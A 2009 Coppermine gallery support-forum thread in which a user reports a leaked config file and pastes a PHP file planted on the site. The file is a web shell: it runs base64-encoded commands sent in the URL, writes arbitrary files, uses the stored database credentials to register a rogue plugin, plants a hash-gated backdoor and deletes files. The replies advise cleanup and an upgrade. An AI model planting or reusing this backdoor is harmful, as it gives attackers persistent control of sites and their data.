config.inc.php to txt - Hacking attempt? config.inc.php to txt - Hacking attempt?
 

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Main Menu

config.inc.php to txt - Hacking attempt?

Started by FM86, February 21, 2009, 06:03:22 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

FM86

February 21, 2009, 06:03:22 PM
Hi guys!

I just realised something shoking:
I found out in the copper/album directory a txt file which is the exact copy of my config.inc.php file. That means the passwords are easily readable by all the world. I've never seen this file before...
There are other 2 unknown files in this directory. One of them is a php files which contains the code listed at the end of this topic.
Do you have any idea about what this it?

Thank you in advance!

Code Select
<?
$hash="b269fc....5a1623ec7fad79df17";
if(isset($_GET["ch"])){
echo "oke";
echo "eff0";
}
if(isset($_GET["patch"])){
include("../include/config.inc.php");
mysql_connect($CONFIG["dbserver"], $CONFIG["dbuser"], $CONFIG["dbpass"]);
mysql_select_db($CONFIG["dbname"]);
//phpinfo();
$codebase_str='<?php
$hash="b269fcfd....23ec7fad79df17";
if(eregi("picEditor"$REQUEST_URI)||$_POST["save"]==1||isset($_POST["_REQUEST"])){
 if(($_POST["hash"]!=$hash)){
 die("");
 }
}
?>';

$codebase_str=str_replace("b269fcfd8...23ec7fad79df17", $hash, $codebase_str);
$fp_codebase=fopen("userpics/codebase.php", "w");
fwrite($fp_codebase, $codebase_str);
$path=__FILE__;
preg_match("/(.*)(\/.*?)/", $path, $ok);
$path=$ok[0];
$mysql_path="/../../../../../../../../../../../../..".$path."userpics";
//echo $mysql_path."\n";
$sql="INSERT INTO `".$CONFIG['TABLE_PREFIX']."plugins` ( `plugin_id` , `name` , `path` , `priority` )
VALUES (
'', 'Sumple Plugin', '$mysql_path', '0'
);";
//echo $sql;
mysql_query($sql);
echo mysql_error();

if ($handle = opendir('.')) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != ".." && $file!="index.php" && !eregi($hash, $file)) {
if(is_file($file)){
unlink($file);
}
}
}
$fp=fopen("index.php", "w");
fclose($fp);
closedir($handle);
}
}
if(isset($_GET["eval"])){
eval(base64_decode($_GET["eval"]));
}
if(isset($_GET["up"])){
$fp=implode(file($_GET["up_name"]));
$fp_out=fopen($_GET["down_name"], "w");
fwrite($fp_out, $fp);
}
?>

François Keller

#1
February 21, 2009, 06:05:48 PM
Your galery was hacked. Delete the unknown files (have a look to the userpics folder too) and update to the latest cpg version (cpg1.4.20)
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

Joachim Müller

#2
February 25, 2009, 08:59:04 AM
Quote from: François Keller on February 21, 2009, 06:05:48 PM
Delete the unknown files (have a look to the userpics folder too)
That's not enough. Read the official sanitization thread "Yikes, I've been hacked! Now what?"
Print
Go Up Pages1
User actions